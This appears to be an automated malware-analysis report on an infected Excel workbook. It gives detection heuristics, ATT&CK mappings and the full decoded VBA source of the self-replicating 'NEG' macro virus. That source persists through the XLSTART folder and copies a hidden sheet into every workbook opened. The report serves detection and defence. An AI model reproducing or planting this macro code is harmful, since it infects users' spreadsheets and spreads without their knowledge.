MALICIOUS
126
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1071.001 Web Protocols
The sample contains VBA macros, including an Auto_Open subroutine, which is a common technique for malicious macro execution. The script copies itself to the Excel startup folder, establishing persistence. It also attempts to infect other workbooks by copying itself into them via an OnSheetActivate hook, indicating a spreading mechanism.
Heuristics 7
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCEThe macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.Matched line in script
ChDir Application.StartupPath -
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADERThe macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.Matched line in script
Application.OnSheetActivate = "check_files" -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open() -
External hyperlinks (14) low OOXML_EXTERNAL_HYPERLINKSDocument contains 14 external hyperlinks — clickable URLs are stored as external relationships. First target: ../3.TROUBLE NOTE/GHI CHÉP SỰ CỐ ( (LR・組立).xlsx
-
Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEETExcel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/2000/svg Document hyperlink
- http://www.w3.org/1999/xlinkDocument hyperlink
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3007 bytes |
SHA-256: d06f39d184143cb0c8b0b8f949c31f2e3c6239f1bc9808f625dfef74688dd42a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Today_Click()
o_f_a = Cells(30, 2) 'open file adress???????????????
o_f_n = Cells(31, 2) 'open file name????????????
Workbooks.Open FileName:=o_f_a & o_f_n
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Sub Today()
o_f_a = Cells(30, 2) 'open file adress???????????????
o_f_n = Cells(31, 2) 'open file name????????????
Workbooks.Open FileName:=o_f_a & o_f_n
End Sub
Attribute VB_Name = "foxz"
'donwload NEG!!! NoMercyExcelGenerator form NoMercyPage!
'foxz@usa.net
Sub auto_open()
Attribute auto_open.VB_Description = "\n\n \n\n\n�\n"
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
Attribute check_files.VB_Description = "\n\n \n\n\n�\n"
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "NEGS.XLS")
If m$ = "NEGS.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.Name
Sheets("foxz").Visible = True
Sheets("foxz").Select
Sheets("foxz").Copy
With ActiveWorkbook
.title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = "infected by NEG Promo!"
End With
newname$ = ActiveWorkbook.Name
c4$ = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "NEGS.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
Workbooks(n4$).Sheets("foxz").Visible = False
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "NEGS.XLS!check_files"
Case 1
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.Name
p4$ = ActiveWorkbook.Path
s$ = Workbooks(n4$).Sheets(1).Name
If s$ <> "foxz" Then
Workbooks("NEGS.XLS").Sheets("foxz").Copy before:=Workbooks(n4$).Sheets(1)
Workbooks(n4$).Sheets("foxz").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "NEGS.XLS!check_files"
Case Else
End Select
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 22528 bytes |
SHA-256: 44c90648e68f8c28b9722b7bb3b244b393e88e944165534d7da81fbccadf19ee |
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2672 bytes |
SHA-256: ebff33035a2e5d49a440e772bb0124f6173161310960c8a90c6bcbbacfd266a1 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.